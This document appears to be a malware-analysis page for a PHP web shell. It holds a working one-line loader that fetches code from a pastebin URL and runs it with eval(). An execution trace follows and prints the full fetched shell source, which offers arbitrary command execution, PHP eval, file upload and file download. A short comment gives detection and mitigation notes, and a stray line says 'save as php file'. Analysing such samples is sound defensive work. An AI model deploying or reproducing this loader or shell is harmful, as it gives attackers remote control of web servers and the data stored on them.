1 2 <?php
/*
 * Remote-loader stub. This file carries no payload of its own:
 * file_get_contents() retrieves the body from the pastebin URL each time the
 * script runs, and eval() executes whatever comes back. The closing-tag
 * prefix passed to eval() drops out of PHP mode first, so a response that
 * opens with its own PHP tag is parsed as a complete PHP file.
 *
 * The execution trace on this page shows what the fetched body did in the
 * sandbox: it offers file download, file upload, exec() of a posted 'cmd'
 * value and eval() of a posted 'eval' value, and it listed
 * /var/www/html/uploads with owner and permission columns.
 *
 * Detection notes: scanning this file alone sees only the stub, never the
 * shell, so match on the eval(file_get_contents(<remote URL>)) shape, on PHP
 * files appearing under an upload directory, and on outbound HTTPS from the
 * web server to a paste site.
 * Mitigation notes: deny script execution in upload directories, set
 * allow_url_fopen=Off where remote stream wrappers are not needed, and
 * restrict egress from the web tier.
 *
 * The text outside the PHP tags ("1 2", "4 5 ... 15") is not code; PHP emits
 * it verbatim, which is why it shows up in the captured page output.
 */
eval("?>" . file_get_contents("https://pastebin.com/raw/1bqzuGb7"));
?> 4 5 6 7 8 9 10 11 12 13 14 15
save as php file
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-12 22:25:36.120087]
1 0 1 0.000148 393464
1 3 0 0.000194 393720 {main} 1 /var/www/html/uploads/1.php 0 0
2 4 0 0.000210 393720 file_get_contents 0 /var/www/html/uploads/1.php 1 1 'https://pastebin.com/raw/1bqzuGb7'
2 4 1 0.045382 403512
2 4 R '<?php\r\n\r\nif (isset($_POST[\'download\'])) {\r\n\t$file = $_POST[\'download\'];\r\n\tif (file_exists($file)) {\r\n\t header(\'Content-Description: File Transfer\');\r\n\t header(\'Content-Type: application/octet-stream\');\r\n\t header(\'Content-Disposition: attachment; filename="\'.basename($file).\'"\');\r\n\t header(\'Expires: 0\');\r\n\t header(\'Cache-Control: must-revalidate\');\r\n\t header(\'Pragma: public\');\r\n\t header(\'Content-Length: \' . filesize($file));\r\n\t rea'
2 5 0 0.045749 443568 eval 1 '?><?php\r\n\r\nif (isset($_POST[\'download\'])) {\r\n\t$file = $_POST[\'download\'];\r\n\tif (file_exists($file)) {\r\n\t header(\'Content-Description: File Transfer\');\r\n\t header(\'Content-Type: application/octet-stream\');\r\n\t header(\'Content-Disposition: attachment; filename="\'.basename($file).\'"\');\r\n\t header(\'Expires: 0\');\r\n\t header(\'Cache-Control: must-revalidate\');\r\n\t header(\'Pragma: public\');\r\n\t header(\'Content-Length: \' . filesize($file));\r\n\t readfile($file);\r\n\t exit;\r\n\t}\r\n}\r\n\r\n?>\r\n\r\n<html>\r\n<!-- Latest compiled and minified CSS -->\r\n<link rel="stylesheet" href="http://maxcdn.bootstrapcdn.com/bootstrap/3.3.6/css/bootstrap.min.css">\r\n\r\n<!-- jQuery library -->\r\n<script src="https://ajax.googleapis.com/ajax/libs/jquery/1.12.2/jquery.min.js"></script>\r\n\r\n<!-- Latest compiled JavaScript -->\r\n<script src="http://maxcdn.bootstrapcdn.com/bootstrap/3.3.6/js/bootstrap.min.js"></script>\r\n\r\n<style>\r\n.btn-link {\r\n border: none;\r\n outline: none;\r\n background: none;\r\n cursor: pointer;\r\n color: #0000EE;\r\n padding: 0;\r\n text-decoration: underline;\r\n font-family: inherit;\r\n font-size: inherit;\r\n}\r\n</style>\r\n\r\n<div class="container">\r\n\r\n\r\n<?php\r\n\r\nfunction printPerms($file) {\r\n\t$mode = fileperms($file);\r\n\tif( $mode & 0x1000 ) { $type=\'p\'; }\r\n\telse if( $mode & 0x2000 ) { $type=\'c\'; }\r\n\telse if( $mode & 0x4000 ) { $type=\'d\'; }\r\n\telse if( $mode & 0x6000 ) { $type=\'b\'; }\r\n\telse if( $mode & 0x8000 ) { $type=\'-\'; }\r\n\telse if( $mode & 0xA000 ) { $type=\'l\'; }\r\n\telse if( $mode & 0xC000 ) { $type=\'s\'; }\r\n\telse $type=\'u\';\r\n\t$owner["read"] = ($mode & 00400) ? \'r\' : \'-\';\r\n\t$owner["write"] = ($mode & 00200) ? \'w\' : \'-\';\r\n\t$owner["execute"] = ($mode & 00100) ? \'x\' : \'-\';\r\n\t$group["read"] = ($mode & 00040) ? \'r\' : \'-\';\r\n\t$group["write"] = ($mode & 00020) ? 
\'w\' : \'-\';\r\n\t$group["execute"] = ($mode & 00010) ? \'x\' : \'-\';\r\n\t$world["read"] = ($mode & 00004) ? \'r\' : \'-\';\r\n\t$world["write"] = ($mode & 00002) ? \'w\' : \'-\';\r\n\t$world["execute"] = ($mode & 00001) ? \'x\' : \'-\';\r\n\tif( $mode & 0x800 ) $owner["execute"] = ($owner[\'execute\']==\'x\') ? \'s\' : \'S\';\r\n\tif( $mode & 0x400 ) $group["execute"] = ($group[\'execute\']==\'x\') ? \'s\' : \'S\';\r\n\tif( $mode & 0x200 ) $world["execute"] = ($world[\'execute\']==\'x\') ? \'t\' : \'T\';\r\n\t$s=sprintf("%1s", $type);\r\n\t$s.=sprintf("%1s%1s%1s", $owner[\'read\'], $owner[\'write\'], $owner[\'execute\']);\r\n\t$s.=sprintf("%1s%1s%1s", $group[\'read\'], $group[\'write\'], $group[\'execute\']);\r\n\t$s.=sprintf("%1s%1s%1s", $world[\'read\'], $world[\'write\'], $world[\'execute\']);\r\n\treturn $s;\r\n}\r\n\r\n\r\n$dir = $_POST[\'dir\'];\r\nif (isset($_GET[\'dir\'])) {\r\n\t$dir = $_GET[\'dir\'];\r\n}\r\n$file = \'\';\r\nif ($dir == NULL or !is_dir($dir)) {\r\n\tif (is_file($dir)) {\r\n\t\techo "enters";\r\n\t\t$file = $dir;\r\n\t\techo $file;\r\n\t}\r\n\t$dir = \'./\';\r\n}\r\n$dir = realpath($dir.\'/\'.$value);\r\n\r\n$dirs = scandir($dir);\r\necho "<h2>Viewing directory " . $dir . "</h2>";\r\necho "\\n<br><form action=\'".$_SERVER[\'PHP_SELF\']."\' method=\'POST\'>";\r\necho "<input type=\'hidden\' name=\'dir\' value=".$dir." 
/>";\r\necho "<input type=\'text\' name=\'cmd\' size=120 autocomplete=\'off\' autofocus>\\n<input type=\'submit\' value=\'Run\'><br>\\n";\r\necho "<input type=\'text\' name=\'eval\' size=120 autocomplete=\'off\' autofocus>\\n<input type=\'submit\' value=\'Execute\'>\\n";\r\necho "</form>";\r\necho "\\n<br>\\n<div class=\'navbar-form\'><form action=\'".$_SERVER[\'PHP_SELF\']."\' method=\'POST\' enctype=\'multipart/form-data\'>\\n";\r\necho "<input type=\'hidden\' name=\'dir\' value=\'".$_POST[\'dir\']."\'/> ";\r\necho "<input type=\'file\' name=\'fileToUpload\' id=\'fileToUpload\'>\\n<br><input type=\'submit\' value=\'Upload File\' name=\'submit\'>";\r\necho "</div>";\r\n\r\nif (isset($_POST[\'submit\'])) {\r\n\t$uploadDirectory = $dir.\'/\'.basename($_FILES[\'fileToUpload\'][\'name\']);\r\n\tif (file_exists($uploadDirectory)) {\r\n \techo "<br><br><b style=\'color:red\'>Error. File already exists in ".$uploadDirectory.".</b></br></br>";\r\n\t}\r\n\telse if (move_uploaded_file($_FILES[\'fileToUpload\'][\'tmp_name\'], $uploadDirectory)) {\r\n\t\techo \'<br><br><b>File \'.$_FILES[\'fileToUpload\'][\'name\'].\' uploaded successfully in \'.$dir.\' !</b><br>\';\r\n\t} else {\r\n\t\techo \'<br><br><b style="color:red">Error uploading file \'.$uploadDirectory.\'</b><br><br>\';\r\n\r\n\t}\r\n\r\n}\r\n\r\nif (isset($_POST[\'cmd\']) && $_POST[\'cmd\'] != "") {\r\n\techo "<br><br><b>Result of command execution: </b><br>";\r\n\texec(\'cd \'.$dir.\' && \'.$_POST[\'cmd\'], $cmdresult);\r\n\tforeach ($cmdresult as $key => $value) {\r\n\t\techo "$value \\n<br>";\r\n\t}\r\n}\r\n\r\nif (isset($_POST[\'eval\']) && $_POST[\'eval\'] != "") {\r\n\techo "<br><br><b>Result of evaluation: </b><br>";\r\n\tchdir($dir);\r\n\tvar_dump(eval($_POST[\'eval\']));\r\n\techo "\\n<br>";\r\n}\r\necho "<br>";\r\n?>\r\n\r\n<table class="table table-hover table-bordered">\r\n <thead>\r\n <tr>\r\n <th>Name</th>\r\n <th>Owner</th>\r\n <th>Permissions</th>\r\n </tr>\r\n </thead>\r\n 
<tbody>\r\n<?php\r\nforeach ($dirs as $key => $value) {\r\n\techo "<form action=\'" . $_SERVER[\'PHP_SELF\'] . "\' method=\'POST\'><tr>";\r\n\tif (is_dir(realpath($dir.\'/\'.$value))) {\r\n\t\t//echo "<td><a href=\'". $_SERVER[\'PHP_SELF\'] . "?dir=". realpath($dir.\'/\'.$value) . "/\'>". $value . "</a></td><td>". posix_getpwuid(fileowner($dir.\'/\'.$value))[name] . "</td><td> " . printPerms($dir) . "</td>\\n";\r\n\t\techo "<td><button type=\'submit\' name=\'dir\' value=\'". realpath($dir.\'/\'.$value) . "\' class=\'btn-link\'>". $value ."</button></td><td>". posix_getpwuid(fileowner($dir.\'/\'.$value))[name] . "</td><td> " . printPerms($dir) . "</td>\\n";\r\n\t}\r\n\telse {\r\n\t\t//echo "<td><a href=\'". $_SERVER[\'PHP_SELF\'] . "?download=". realpath($dir.\'/\'.$value) . "\'>". $value . "</a></td><td>". posix_getpwuid(fileowner($dir.\'/\'.$value))[name] ."</td><td> " . printPerms($dir) . "</td>\\n";\r\n\t\techo "<td><button type=\'submit\' name=\'download\' value=\'". realpath($dir.\'/\'.$value) . "\' class=\'btn-link\'>". $value ."</button></td><td>". posix_getpwuid(fileowner($dir.\'/\'.$value))[name] ."</td><td> " . printPerms($dir) . "</td>\\n";\r\n\t}\r\n\techo "</tr></form>";\r\n}\r\necho "</tbody>";\r\necho "</table>";\r\n\r\n\r\n?>\r\n\r\n\r\n\r\n</div>\r\n</html>' /var/www/html/uploads/1.php 1 0
2 A /var/www/html/uploads/1.php(1) : eval()'d code 79 $dir = NULL
2 A /var/www/html/uploads/1.php(1) : eval()'d code 83 $file = ''
3 6 0 0.046052 443568 is_file 0 /var/www/html/uploads/1.php(1) : eval()'d code 85 1 NULL
3 6 1 0.046071 443608
3 6 R FALSE
2 A /var/www/html/uploads/1.php(1) : eval()'d code 90 $dir = './'
3 7 0 0.046106 443600 realpath 0 /var/www/html/uploads/1.php(1) : eval()'d code 92 1 './/'
3 7 1 0.046127 443680
3 7 R '/var/www/html/uploads'
2 A /var/www/html/uploads/1.php(1) : eval()'d code 92 $dir = '/var/www/html/uploads'
3 8 0 0.046153 443616 scandir 0 /var/www/html/uploads/1.php(1) : eval()'d code 94 1 '/var/www/html/uploads'
3 8 1 0.046211 444232
3 8 R [0 => '.', 1 => '..', 2 => '.htaccess', 3 => '1.php', 4 => 'data', 5 => 'prepend.php']
2 A /var/www/html/uploads/1.php(1) : eval()'d code 94 $dirs = [0 => '.', 1 => '..', 2 => '.htaccess', 3 => '1.php', 4 => 'data', 5 => 'prepend.php']
2 A /var/www/html/uploads/1.php(1) : eval()'d code 147 $key = 0
3 9 0 0.046280 444248 realpath 0 /var/www/html/uploads/1.php(1) : eval()'d code 149 1 '/var/www/html/uploads/.'
3 9 1 0.046295 444328
3 9 R '/var/www/html/uploads'
3 10 0 0.046310 444248 is_dir 0 /var/www/html/uploads/1.php(1) : eval()'d code 149 1 '/var/www/html/uploads'
3 10 1 0.046327 444312
3 10 R TRUE
3 11 0 0.046341 444272 realpath 0 /var/www/html/uploads/1.php(1) : eval()'d code 151 1 '/var/www/html/uploads/.'
3 11 1 0.046354 444352
3 11 R '/var/www/html/uploads'
3 12 0 0.046370 444400 fileowner 0 /var/www/html/uploads/1.php(1) : eval()'d code 151 1 '/var/www/html/uploads/.'
3 12 1 0.046394 444440
3 12 R 0
3 13 0 0.046407 444352 posix_getpwuid 0 /var/www/html/uploads/1.php(1) : eval()'d code 151 1 0
3 13 1 0.046451 445152
3 13 R ['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
3 14 0 0.046486 444384 printPerms 1 /var/www/html/uploads/1.php(1) : eval()'d code 151 1 '/var/www/html/uploads'
4 15 0 0.046501 444384 fileperms 0 /var/www/html/uploads/1.php(1) : eval()'d code 50 1 '/var/www/html/uploads'
4 15 1 0.046518 444424
4 15 R 16895
3 A /var/www/html/uploads/1.php(1) : eval()'d code 50 $mode = 16895
3 A /var/www/html/uploads/1.php(1) : eval()'d code 53 $type = 'd'
3 A /var/www/html/uploads/1.php(1) : eval()'d code 59 $owner['read'] = 'r'
3 A /var/www/html/uploads/1.php(1) : eval()'d code 60 $owner['write'] = 'w'
3 A /var/www/html/uploads/1.php(1) : eval()'d code 61 $owner['execute'] = 'x'
3 A /var/www/html/uploads/1.php(1) : eval()'d code 62 $group['read'] = 'r'
3 A /var/www/html/uploads/1.php(1) : eval()'d code 63 $group['write'] = 'w'
3 A /var/www/html/uploads/1.php(1) : eval()'d code 64 $group['execute'] = 'x'
3 A /var/www/html/uploads/1.php(1) : eval()'d code 65 $world['read'] = 'r'
3 A /var/www/html/uploads/1.php(1) : eval()'d code 66 $world['write'] = 'w'
3 A /var/www/html/uploads/1.php(1) : eval()'d code 67 $world['execute'] = 'x'
4 16 0 0.046657 445512 sprintf 0 /var/www/html/uploads/1.php(1) : eval()'d code 71 2 '%1s' 'd'
4 16 1 0.046672 445896
4 16 R 'd'
3 A /var/www/html/uploads/1.php(1) : eval()'d code 71 $s = 'd'
4 17 0 0.046696 445832 sprintf 0 /var/www/html/uploads/1.php(1) : eval()'d code 72 4 '%1s%1s%1s' 'r' 'w' 'x'
4 17 1 0.046712 446216
4 17 R 'rwx'
3 A /var/www/html/uploads/1.php(1) : eval()'d code 72 $s .= 'rwx'
4 18 0 0.046736 445544 sprintf 0 /var/www/html/uploads/1.php(1) : eval()'d code 73 4 '%1s%1s%1s' 'r' 'w' 'x'
4 18 1 0.046752 445928
4 18 R 'rwx'
3 A /var/www/html/uploads/1.php(1) : eval()'d code 73 $s .= 'rwx'
4 19 0 0.046775 445544 sprintf 0 /var/www/html/uploads/1.php(1) : eval()'d code 74 4 '%1s%1s%1s' 'r' 'w' 'x'
4 19 1 0.046790 445928
4 19 R 'rwx'
3 A /var/www/html/uploads/1.php(1) : eval()'d code 74 $s .= 'rwx'
3 14 1 0.046813 444424
3 14 R 'drwxrwxrwx'
2 A /var/www/html/uploads/1.php(1) : eval()'d code 147 $key = 1
3 20 0 0.046840 444280 realpath 0 /var/www/html/uploads/1.php(1) : eval()'d code 149 1 '/var/www/html/uploads/..'
3 20 1 0.046854 444352
3 20 R '/var/www/html'
3 21 0 0.046868 444264 is_dir 0 /var/www/html/uploads/1.php(1) : eval()'d code 149 1 '/var/www/html'
3 21 1 0.046884 444296
3 21 R TRUE
3 22 0 0.046897 444272 realpath 0 /var/www/html/uploads/1.php(1) : eval()'d code 151 1 '/var/www/html/uploads/..'
3 22 1 0.046911 444344
3 22 R '/var/www/html'
3 23 0 0.046925 444400 fileowner 0 /var/www/html/uploads/1.php(1) : eval()'d code 151 1 '/var/www/html/uploads/..'
3 23 1 0.046941 444456
3 23 R 0
3 24 0 0.046953 444360 posix_getpwuid 0 /var/www/html/uploads/1.php(1) : eval()'d code 151 1 0
3 24 1 0.046978 445160
3 24 R ['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
3 25 0 0.047008 444392 printPerms 1 /var/www/html/uploads/1.php(1) : eval()'d code 151 1 '/var/www/html/uploads'
4 26 0 0.047022 444392 fileperms 0 /var/www/html/uploads/1.php(1) : eval()'d code 50 1 '/var/www/html/uploads'
4 26 1 0.047038 444424
4 26 R 16895
3 A /var/www/html/uploads/1.php(1) : eval()'d code 50 $mode = 16895
3 A /var/www/html/uploads/1.php(1) : eval()'d code 53 $type = 'd'
3 A /var/www/html/uploads/1.php(1) : eval()'d code 59 $owner['read'] = 'r'
3 A /var/www/html/uploads/1.php(1) : eval()'d code 60 $owner['write'] = 'w'
3 A /var/www/html/uploads/1.php(1) : eval()'d code 61 $owner['execute'] = 'x'
3 A /var/www/html/uploads/1.php(1) : eval()'d code 62 $group['read'] = 'r'
3 A /var/www/html/uploads/1.php(1) : eval()'d code 63 $group['write'] = 'w'
3 A /var/www/html/uploads/1.php(1) : eval()'d code 64 $group['execute'] = 'x'
3 A /var/www/html/uploads/1.php(1) : eval()'d code 65 $world['read'] = 'r'
3 A /var/www/html/uploads/1.php(1) : eval()'d code 66 $world['write'] = 'w'
3 A /var/www/html/uploads/1.php(1) : eval()'d code 67 $world['execute'] = 'x'
4 27 0 0.047176 445512 sprintf 0 /var/www/html/uploads/1.php(1) : eval()'d code 71 2 '%1s' 'd'
4 27 1 0.047190 445896
4 27 R 'd'
3 A /var/www/html/uploads/1.php(1) : eval()'d code 71 $s = 'd'
4 28 0 0.047213 445832 sprintf 0 /var/www/html/uploads/1.php(1) : eval()'d code 72 4 '%1s%1s%1s' 'r' 'w' 'x'
4 28 1 0.047228 446216
4 28 R 'rwx'
3 A /var/www/html/uploads/1.php(1) : eval()'d code 72 $s .= 'rwx'
4 29 0 0.047252 445544 sprintf 0 /var/www/html/uploads/1.php(1) : eval()'d code 73 4 '%1s%1s%1s' 'r' 'w' 'x'
4 29 1 0.047266 445928
4 29 R 'rwx'
3 A /var/www/html/uploads/1.php(1) : eval()'d code 73 $s .= 'rwx'
4 30 0 0.047289 445544 sprintf 0 /var/www/html/uploads/1.php(1) : eval()'d code 74 4 '%1s%1s%1s' 'r' 'w' 'x'
4 30 1 0.047304 445928
4 30 R 'rwx'
3 A /var/www/html/uploads/1.php(1) : eval()'d code 74 $s .= 'rwx'
3 25 1 0.047327 444424
3 25 R 'drwxrwxrwx'
2 A /var/www/html/uploads/1.php(1) : eval()'d code 147 $key = 2
3 31 0 0.047353 444280 realpath 0 /var/www/html/uploads/1.php(1) : eval()'d code 149 1 '/var/www/html/uploads/.htaccess'
3 31 1 0.047369 444368
3 31 R '/var/www/html/uploads/.htaccess'
3 32 0 0.047384 444280 is_dir 0 /var/www/html/uploads/1.php(1) : eval()'d code 149 1 '/var/www/html/uploads/.htaccess'
3 32 1 0.047400 444328
3 32 R FALSE
3 33 0 0.047413 444288 realpath 0 /var/www/html/uploads/1.php(1) : eval()'d code 155 1 '/var/www/html/uploads/.htaccess'
3 33 1 0.047426 444376
3 33 R '/var/www/html/uploads/.htaccess'
3 34 0 0.047441 444448 fileowner 0 /var/www/html/uploads/1.php(1) : eval()'d code 155 1 '/var/www/html/uploads/.htaccess'
3 34 1 0.047455 444488
3 34 R 0
3 35 0 0.047467 444392 posix_getpwuid 0 /var/www/html/uploads/1.php(1) : eval()'d code 155 1 0
3 35 1 0.047490 445192
3 35 R ['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
3 36 0 0.047520 444424 printPerms 1 /var/www/html/uploads/1.php(1) : eval()'d code 155 1 '/var/www/html/uploads'
4 37 0 0.047533 444424 fileperms 0 /var/www/html/uploads/1.php(1) : eval()'d code 50 1 '/var/www/html/uploads'
4 37 1 0.047549 444456
4 37 R 16895
3 A /var/www/html/uploads/1.php(1) : eval()'d code 50 $mode = 16895
3 A /var/www/html/uploads/1.php(1) : eval()'d code 53 $type = 'd'
3 A /var/www/html/uploads/1.php(1) : eval()'d code 59 $owner['read'] = 'r'
3 A /var/www/html/uploads/1.php(1) : eval()'d code 60 $owner['write'] = 'w'
3 A /var/www/html/uploads/1.php(1) : eval()'d code 61 $owner['execute'] = 'x'
3 A /var/www/html/uploads/1.php(1) : eval()'d code 62 $group['read'] = 'r'
3 A /var/www/html/uploads/1.php(1) : eval()'d code 63 $group['write'] = 'w'
3 A /var/www/html/uploads/1.php(1) : eval()'d code 64 $group['execute'] = 'x'
3 A /var/www/html/uploads/1.php(1) : eval()'d code 65 $world['read'] = 'r'
3 A /var/www/html/uploads/1.php(1) : eval()'d code 66 $world['write'] = 'w'
3 A /var/www/html/uploads/1.php(1) : eval()'d code 67 $world['execute'] = 'x'
4 38 0 0.047699 445544 sprintf 0 /var/www/html/uploads/1.php(1) : eval()'d code 71 2 '%1s' 'd'
4 38 1 0.047714 445928
4 38 R 'd'
3 A /var/www/html/uploads/1.php(1) : eval()'d code 71 $s = 'd'
4 39 0 0.047739 445864 sprintf 0 /var/www/html/uploads/1.php(1) : eval()'d code 72 4 '%1s%1s%1s' 'r' 'w' 'x'
4 39 1 0.047770 446248
4 39 R 'rwx'
3 A /var/www/html/uploads/1.php(1) : eval()'d code 72 $s .= 'rwx'
4 40 0 0.047796 445576 sprintf 0 /var/www/html/uploads/1.php(1) : eval()'d code 73 4 '%1s%1s%1s' 'r' 'w' 'x'
4 40 1 0.047811 445960
4 40 R 'rwx'
3 A /var/www/html/uploads/1.php(1) : eval()'d code 73 $s .= 'rwx'
4 41 0 0.047834 445576 sprintf 0 /var/www/html/uploads/1.php(1) : eval()'d code 74 4 '%1s%1s%1s' 'r' 'w' 'x'
4 41 1 0.047853 445960
4 41 R 'rwx'
3 A /var/www/html/uploads/1.php(1) : eval()'d code 74 $s .= 'rwx'
3 36 1 0.047876 444456
3 36 R 'drwxrwxrwx'
2 A /var/www/html/uploads/1.php(1) : eval()'d code 147 $key = 3
3 42 0 0.047902 444280 realpath 0 /var/www/html/uploads/1.php(1) : eval()'d code 149 1 '/var/www/html/uploads/1.php'
3 42 1 0.047917 444368
3 42 R '/var/www/html/uploads/1.php'
3 43 0 0.047931 444280 is_dir 0 /var/www/html/uploads/1.php(1) : eval()'d code 149 1 '/var/www/html/uploads/1.php'
3 43 1 0.047948 444328
3 43 R FALSE
3 44 0 0.047961 444288 realpath 0 /var/www/html/uploads/1.php(1) : eval()'d code 155 1 '/var/www/html/uploads/1.php'
3 44 1 0.047975 444376
3 44 R '/var/www/html/uploads/1.php'
3 45 0 0.047990 444448 fileowner 0 /var/www/html/uploads/1.php(1) : eval()'d code 155 1 '/var/www/html/uploads/1.php'
3 45 1 0.048004 444488
3 45 R 1000
3 46 0 0.048017 444392 posix_getpwuid 0 /var/www/html/uploads/1.php(1) : eval()'d code 155 1 1000
3 46 1 0.048049 445208
3 46 R ['name' => 'osboxes', 'passwd' => 'x', 'uid' => 1000, 'gid' => 1000, 'gecos' => 'osboxes.org,,,', 'dir' => '/home/osboxes', 'shell' => '/bin/bash']
3 47 0 0.048083 444392 printPerms 1 /var/www/html/uploads/1.php(1) : eval()'d code 155 1 '/var/www/html/uploads'
4 48 0 0.048097 444392 fileperms 0 /var/www/html/uploads/1.php(1) : eval()'d code 50 1 '/var/www/html/uploads'
4 48 1 0.048112 444424
4 48 R 16895
3 A /var/www/html/uploads/1.php(1) : eval()'d code 50 $mode = 16895
3 A /var/www/html/uploads/1.php(1) : eval()'d code 53 $type = 'd'
3 A /var/www/html/uploads/1.php(1) : eval()'d code 59 $owner['read'] = 'r'
3 A /var/www/html/uploads/1.php(1) : eval()'d code 60 $owner['write'] = 'w'
3 A /var/www/html/uploads/1.php(1) : eval()'d code 61 $owner['execute'] = 'x'
3 A /var/www/html/uploads/1.php(1) : eval()'d code 62 $group['read'] = 'r'
3 A /var/www/html/uploads/1.php(1) : eval()'d code 63 $group['write'] = 'w'
3 A /var/www/html/uploads/1.php(1) : eval()'d code 64 $group['execute'] = 'x'
3 A /var/www/html/uploads/1.php(1) : eval()'d code 65 $world['read'] = 'r'
3 A /var/www/html/uploads/1.php(1) : eval()'d code 66 $world['write'] = 'w'
3 A /var/www/html/uploads/1.php(1) : eval()'d code 67 $world['execute'] = 'x'
4 49 0 0.048245 445512 sprintf 0 /var/www/html/uploads/1.php(1) : eval()'d code 71 2 '%1s' 'd'
4 49 1 0.048259 445896
4 49 R 'd'
3 A /var/www/html/uploads/1.php(1) : eval()'d code 71 $s = 'd'
4 50 0 0.048282 445832 sprintf 0 /var/www/html/uploads/1.php(1) : eval()'d code 72 4 '%1s%1s%1s' 'r' 'w' 'x'
4 50 1 0.048297 446216
4 50 R 'rwx'
3 A /var/www/html/uploads/1.php(1) : eval()'d code 72 $s .= 'rwx'
4 51 0 0.048320 445544 sprintf 0 /var/www/html/uploads/1.php(1) : eval()'d code 73 4 '%1s%1s%1s' 'r' 'w' 'x'
4 51 1 0.048335 445928
4 51 R 'rwx'
3 A /var/www/html/uploads/1.php(1) : eval()'d code 73 $s .= 'rwx'
4 52 0 0.048358 445544 sprintf 0 /var/www/html/uploads/1.php(1) : eval()'d code 74 4 '%1s%1s%1s' 'r' 'w' 'x'
4 52 1 0.048373 445928
4 52 R 'rwx'
3 A /var/www/html/uploads/1.php(1) : eval()'d code 74 $s .= 'rwx'
3 47 1 0.048396 444424
3 47 R 'drwxrwxrwx'
2 A /var/www/html/uploads/1.php(1) : eval()'d code 147 $key = 4
3 53 0 0.048422 444280 realpath 0 /var/www/html/uploads/1.php(1) : eval()'d code 149 1 '/var/www/html/uploads/data'
3 53 1 0.048438 444368
3 53 R '/var/www/html/uploads/data'
3 54 0 0.048452 444280 is_dir 0 /var/www/html/uploads/1.php(1) : eval()'d code 149 1 '/var/www/html/uploads/data'
3 54 1 0.048467 444328
3 54 R TRUE
3 55 0 0.048480 444288 realpath 0 /var/www/html/uploads/1.php(1) : eval()'d code 151 1 '/var/www/html/uploads/data'
3 55 1 0.048493 444376
3 55 R '/var/www/html/uploads/data'
3 56 0 0.048508 444448 fileowner 0 /var/www/html/uploads/1.php(1) : eval()'d code 151 1 '/var/www/html/uploads/data'
3 56 1 0.048522 444488
3 56 R 0
3 57 0 0.048534 444392 posix_getpwuid 0 /var/www/html/uploads/1.php(1) : eval()'d code 151 1 0
3 57 1 0.048562 445192
3 57 R ['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
3 58 0 0.048592 444392 printPerms 1 /var/www/html/uploads/1.php(1) : eval()'d code 151 1 '/var/www/html/uploads'
4 59 0 0.048606 444392 fileperms 0 /var/www/html/uploads/1.php(1) : eval()'d code 50 1 '/var/www/html/uploads'
4 59 1 0.048621 444424
4 59 R 16895
3 A /var/www/html/uploads/1.php(1) : eval()'d code 50 $mode = 16895
3 A /var/www/html/uploads/1.php(1) : eval()'d code 53 $type = 'd'
3 A /var/www/html/uploads/1.php(1) : eval()'d code 59 $owner['read'] = 'r'
3 A /var/www/html/uploads/1.php(1) : eval()'d code 60 $owner['write'] = 'w'
3 A /var/www/html/uploads/1.php(1) : eval()'d code 61 $owner['execute'] = 'x'
3 A /var/www/html/uploads/1.php(1) : eval()'d code 62 $group['read'] = 'r'
3 A /var/www/html/uploads/1.php(1) : eval()'d code 63 $group['write'] = 'w'
3 A /var/www/html/uploads/1.php(1) : eval()'d code 64 $group['execute'] = 'x'
3 A /var/www/html/uploads/1.php(1) : eval()'d code 65 $world['read'] = 'r'
3 A /var/www/html/uploads/1.php(1) : eval()'d code 66 $world['write'] = 'w'
3 A /var/www/html/uploads/1.php(1) : eval()'d code 67 $world['execute'] = 'x'
4 60 0 0.048754 445512 sprintf 0 /var/www/html/uploads/1.php(1) : eval()'d code 71 2 '%1s' 'd'
4 60 1 0.048768 445896
4 60 R 'd'
3 A /var/www/html/uploads/1.php(1) : eval()'d code 71 $s = 'd'
4 61 0 0.048791 445832 sprintf 0 /var/www/html/uploads/1.php(1) : eval()'d code 72 4 '%1s%1s%1s' 'r' 'w' 'x'
4 61 1 0.048807 446216
4 61 R 'rwx'
3 A /var/www/html/uploads/1.php(1) : eval()'d code 72 $s .= 'rwx'
4 62 0 0.048830 445544 sprintf 0 /var/www/html/uploads/1.php(1) : eval()'d code 73 4 '%1s%1s%1s' 'r' 'w' 'x'
4 62 1 0.048854 445928
4 62 R 'rwx'
3 A /var/www/html/uploads/1.php(1) : eval()'d code 73 $s .= 'rwx'
4 63 0 0.048877 445544 sprintf 0 /var/www/html/uploads/1.php(1) : eval()'d code 74 4 '%1s%1s%1s' 'r' 'w' 'x'
4 63 1 0.048892 445928
4 63 R 'rwx'
3 A /var/www/html/uploads/1.php(1) : eval()'d code 74 $s .= 'rwx'
3 58 1 0.048915 444424
3 58 R 'drwxrwxrwx'
2 A /var/www/html/uploads/1.php(1) : eval()'d code 147 $key = 5
3 64 0 0.048940 444288 realpath 0 /var/www/html/uploads/1.php(1) : eval()'d code 149 1 '/var/www/html/uploads/prepend.php'
3 64 1 0.048955 444384
3 64 R '/var/www/html/uploads/prepend.php'
3 65 0 0.048969 444288 is_dir 0 /var/www/html/uploads/1.php(1) : eval()'d code 149 1 '/var/www/html/uploads/prepend.php'
3 65 1 0.048986 444344
3 65 R FALSE
3 66 0 0.048999 444304 realpath 0 /var/www/html/uploads/1.php(1) : eval()'d code 155 1 '/var/www/html/uploads/prepend.php'
3 66 1 0.049012 444400
3 66 R '/var/www/html/uploads/prepend.php'
3 67 0 0.049028 444464 fileowner 0 /var/www/html/uploads/1.php(1) : eval()'d code 155 1 '/var/www/html/uploads/prepend.php'
3 67 1 0.049042 444504
3 67 R 0
3 68 0 0.049054 444400 posix_getpwuid 0 /var/www/html/uploads/1.php(1) : eval()'d code 155 1 0
3 68 1 0.049077 445200
3 68 R ['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
3 69 0 0.049107 444432 printPerms 1 /var/www/html/uploads/1.php(1) : eval()'d code 155 1 '/var/www/html/uploads'
4 70 0 0.049121 444432 fileperms 0 /var/www/html/uploads/1.php(1) : eval()'d code 50 1 '/var/www/html/uploads'
4 70 1 0.049137 444456
4 70 R 16895
3 A /var/www/html/uploads/1.php(1) : eval()'d code 50 $mode = 16895
